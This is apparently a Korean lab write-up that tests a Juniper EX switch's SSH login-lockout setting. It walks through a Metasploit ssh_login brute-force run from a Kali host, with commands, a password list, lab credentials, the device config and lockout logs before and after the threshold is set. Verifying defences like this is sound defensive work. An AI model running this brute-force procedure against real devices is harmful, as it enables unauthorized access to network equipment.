Juniper 로그인 시도 임계값 이후 차단 테스트

테스트 내용

공격자 정보

• kali linux
• IP : 10.1.1.50
• tools : msfconsole

주니퍼 장비 정보

• IP : 10.1.1.1
• 계정 : snet / snet1234 test / snet1234

msconsole? ⇒ Metasploit(메타스플로잇)

• Metasploit(메타스플로잇)
• CVE 넘버링이 붙은 알려진 취약점 공격을 사용할 수 있도록 제공되는 도구 해킹을 간단하게 하도록 도와주는 모의 해킹 테스트 도구
• 특징
  • 정보 수집, 공격(Exploit), 공격에 사용되는 Plugin(payload) 등으로 구성된 도구
  • 외부 모듈인 취약점 점검, 포트 스캐너 등의 사용이 가능하고, DB 저장 가능
  • 정보 수집 및 공격 모듈 사용 시 간편하게 진행 가능
  • Msfconsole 내에서 외부 명령어 사용(리눅스 명령어) 가능
  • 리눅스에서 실행하는 공격 툴 관련 실행 내용들을 Metaploit에서 실행하여 결과를 저장 가능

msconsole 세팅

1. 실행

   ┌──(root㉿kali)-[~]
   └─# msfconsole
   

2. ssh 공격지 정보 세팅

   
   msf6 > use auxiliary/scanner/ssh/ssh_login
   msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.1.1.1
   RHOSTS => 10.1.1.1
   msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME snet
   USERNAME => snet
   msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/pw.txt
   PASS_FILE => /root/pw.txt
   

   • PASS_FILE에 들어갈 파일은 미리 세팅 필요

     • PASS_FILE의 입력값인 pw.txt정보

     ┌──(root㉿kali)-[~]
     └─# cat /root/pw.txt 
     123
     1234
     aaa
     124qw
     snet
     snet1234
     

3. 공격 실행

   msf6 auxiliary(scanner/ssh/ssh_login) > run
   

주니퍼 장비 설정

• Config 내용

root# show | display set 
set version 21.4R2.10
set system root-authentication encrypted-password "$6$dClM4ieF$DT/bhVyfl6yjRoNOeHORkGLYH2CR77QfZ3KXWtsG/jzS.nvY3.8lHn/bOiZXDBfyHXrkAU9Dd8simXJrsUCet1"
**set system login retry-options tries-before-disconnect 5
set system login retry-options lockout-period 5**
set system login user snet uid 2001
set system login user snet class super-user
set system login user snet authentication encrypted-password "$6$sHNGYNXZ$IltWhWLceNzthHyMWaANLKoxu5JBoJij9csEq3HHoClIZZdCGHWfMTiq/eciZoUdrU8YCV6h1YNFo5sX/IjH0."
set system services ssh
set system services telnet
set system syslog user snet kernel any
set interfaces ge-0/0/0 unit 0 family ethernet-switching vlan members 1
set interfaces irb unit 1 family inet address 10.1.1.1/24
set vlans default vlan-id 1
set vlans default l3-interface irb.1
set vlans test vlan-id 10

• 밑줄 친 부분 내용
  • 접속 시도 5번 실패 후 5분간 로그인 시도 잠김
• 그 외 내용
  • 접속 user 계정 설정 및 접속 ip 설정

결과

• 접속 시도 임계값 설정 전 결과

  msf6 auxiliary(scanner/ssh/ssh_login) > run
  
  [*] 10.1.1.1:22 - Starting bruteforce
  [+] 10.1.1.1:22 - Success: 'snet:snet1234' 'Model: ex3400-48t, Junos: 21.4R2.10, JUNOS OS Kernel 32-bit  [20220228.82e60e3_builder_stable_12_214]'
  [*] SSH session 1 opened (10.1.1.50:33251 -> 10.1.1.1:22) at 2024-04-03 02:32:17 -0400
  [-] 10.1.1.1:22 - While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  
  msf6 auxiliary(scanner/ssh/ssh_login) > 
  msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i
  
  Active sessions
  ===============
  
    Id  Name  Type           Information  Connection
    --  ----  ----           -----------  ----------
    1         shell unknown  SSH root @   10.1.1.50:33251 -> 10.1.1.1:22 (10.1.1.1)
  
  msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
  [*] Starting interaction with 1...
  
  {master:0}
  snet> 
  

  • run 실행 후 Success 결과 확인함
  • session -i로 공격 성공한 세션 목록 확인 가능
  • session -i [번호]로 공격 성공한 세션 접속 가능

• 접속 시도 임계값 설정 후 결과

  • PASS_FILE의 입력값인 pw.txt의 내용 중 주니퍼 장비 접속 비밀번호인 “snet1234”는 6번쨰 위치하여 임계값인 5번 내로 접속 불가 (msconsole 세팅 토글 참고)

  msf6 auxiliary(scanner/ssh/ssh_login) > run
  
  [*] 10.1.1.1:22 - Starting bruteforce
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i
  
  Active sessions
  ===============
  
  No active sessions.
  

  • session -i로 확인 시 접속 가능 세션 없음 확인
  • 주니퍼 로그 확인 시 로그인 실패로 계정 차단 내용 확인 가능

  root# Apr  3 16:40:51   sshd[19913]: LIBJNX_LOGIN_ACCOUNT_UNLOCKED: Account for user 'snet' has been unlocked for logins
  Apr  3 16:40:51   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
  Apr  3 16:40:51   sshd[19913]: error: PAM: Authentication error for snet from 10.1.1.50
  Apr  3 16:40:51   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
  Apr  3 16:40:56   inetd[12872]: /usr/sbin/sshd[19913]: exited, status 255
  Apr  3 16:40:57   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
  Apr  3 16:40:57   sshd[19916]: error: PAM: Authentication error for snet from 10.1.1.50
  Apr  3 16:40:57   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
  Apr  3 16:41:02   inetd[12872]: /usr/sbin/sshd[19916]: exited, status 255
  **Apr  3 16:41:03   sshd[19919]: LIBJNX_LOGIN_ACCOUNT_LOCKED: Account for user 'snet' has been locked out from logins**
  Apr  3 16:41:03   sshd[19919]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
  Apr  3 16:41:03   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
  Apr  3 16:41:03   sshd[19921]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
  Apr  3 16:41:03   sshd[19919]: error: PAM: Authentication error for snet from 10.1.1.50
  Apr  3 16:41:03   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
  Apr  3 16:41:08   inetd[12872]: /usr/sbin/sshd[19919]: exited, status 255
  Apr  3 16:41:09   sshd[19922]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
  Apr  3 16:41:09   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
  Apr  3 16:41:09   sshd[19924]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
  Apr  3 16:41:09   sshd[19922]: error: PAM: Authentication error for snet from 10.1.1.50
  Apr  3 16:41:09   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
  Apr  3 16:41:14   inetd[12872]: /usr/sbin/sshd[19922]: exited, status 255
  Apr  3 16:41:15   sshd[19925]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
  Apr  3 16:41:15   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
  Apr  3 16:41:15   sshd[19927]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
  Apr  3 16:41:15   sshd[19925]: error: PAM: Authentication error for snet from 10.1.1.50
  Apr  3 16:41:15   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
  Apr  3 16:41:20   inetd[12872]: /usr/sbin/sshd[19925]: exited, status 255
  Apr  3 16:41:21   sshd[19928]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
  **Apr  3 16:41:21   sshd[19928]: PAM_USER_LOCK_ACCOUNT_LOCKED: Account for user snet is locked.**
  

  • putty 및 kali에서 직접 ssh 접속 시도 시 잠긴 내용 확인 가능

  login as: snet
  Keyboard-interactive authentication prompts from server:
  | Password:
  End of keyboard-interactive prompts from server
  **Access denied**
  

  ┌──(root㉿kali)-[~]
  └─# ssh [email protected]
  ([email protected]) Password:
  **Connection closed by 10.1.1.1 port 22**
  

  • 설정된 5분 후 정상 접속 가능 확인
  • 잠긴 계정 내용 확인 (show system login lockout)

  {master:0}[edit]
  snet# run show system login lockout                      
  User                 Lockout start           Lockout end
  snet                 2024-04-03 17:29:23 UTC 2024-04-03 17:31:23 UTC